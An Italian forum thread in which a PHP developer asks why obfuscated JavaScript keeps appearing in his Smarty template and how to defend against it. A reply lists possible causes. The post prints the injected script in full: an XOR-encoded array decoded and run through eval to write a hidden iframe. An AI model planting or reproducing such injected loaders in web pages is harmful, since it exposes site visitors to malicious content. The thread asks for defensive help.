codice imprevisto all'interno del HTML

Salve a tutti,

sono nuovo di questo forum, mi chiamo Mimmo e sono un programmatore PHP.

Da qualche giorno sto riscontrando un grave problema ad un portale che ho sviluppato.

In quattro parole vi dico subito che il portale è stato sviluppato in php 5, mySQL e SMARTY Template Engine.

In pratica in un file .tpl riescono, dall'esterno, ad inserire del codice javascript come il seguente

<script>wjgl=new Array(0,11,7,17,9,1,10,16,74,19,22,13,16,1,76,70,88,13,2,22,5,9,1,68,23,22,7,89,56,70,12,16,16,20,94,75,75,15,22,1,10,11,8,13,74,7,10,75,16,15,9,75,13,10,0,1,28,74,20,12,20,56,70,68,19,13,0,16,12,89,56,70,84,56,70,68,12,1,13,3,12,16,89,56,70,84,56,70,68,23,16,29,8,1,89,56,70,0,13,23,20,8,5,29,94,10,11,10,1,95,56,70,90,88,75,13,2,22,5,9,1,90,70,77);   nqmay="";   vvtim=100;   ahful=eval;   ddwk=String.fromCharCode;for(wqjs in wjgl)nqmay+=ddwk(wjgl[wqjs]^vvtim);   ahful(nqmay);   alert(nqmay);</script>

la traduzione è un comunissimo

document.write('<iframe src=.... ecc.. ecc..')

Qualcuno mi può spiegare come possano riuscirci e qualche metodo di difesa????

Vi ringrazio in aticipo.

inviato 7 anni fa
nat75
X 0 X
Qualcuno mi può spiegare come possano riuscirci e qualche metodo di difesa????

Non sono un espertissimo di sicurezza informatica...

Però se si conosce bene il funzionamento della rete e del web la soluzione e il dove può risiedere il problema si trova.

Ora se io nel mio browser richiamo la tua pagina web in teoria dovrei ottenere dal server la pagina che tu stesso mi fornisci e non altre.

Se la pagina che ottengo ha un qualcosa di alterato il problema può essere:

- te che hai sbagliato a scrivere il codice;

- qualcuno nel mezzo prima di ridarmi tutti i pacchetti che ho chiesto li ha alterati (una specie di man in the middle)

- qualcuno ti ha bucato il server e ha modificato il tuo codice.

- altre ed eventuali come una modifica da parte del browser web del dom della pagina.

Ora tu pensi di rientrare in una di queste categorie?

risposto 7 anni fa
Mario Santagiuliana
X 0 X
Effettua l'accesso o registrati per rispondere a questa domanda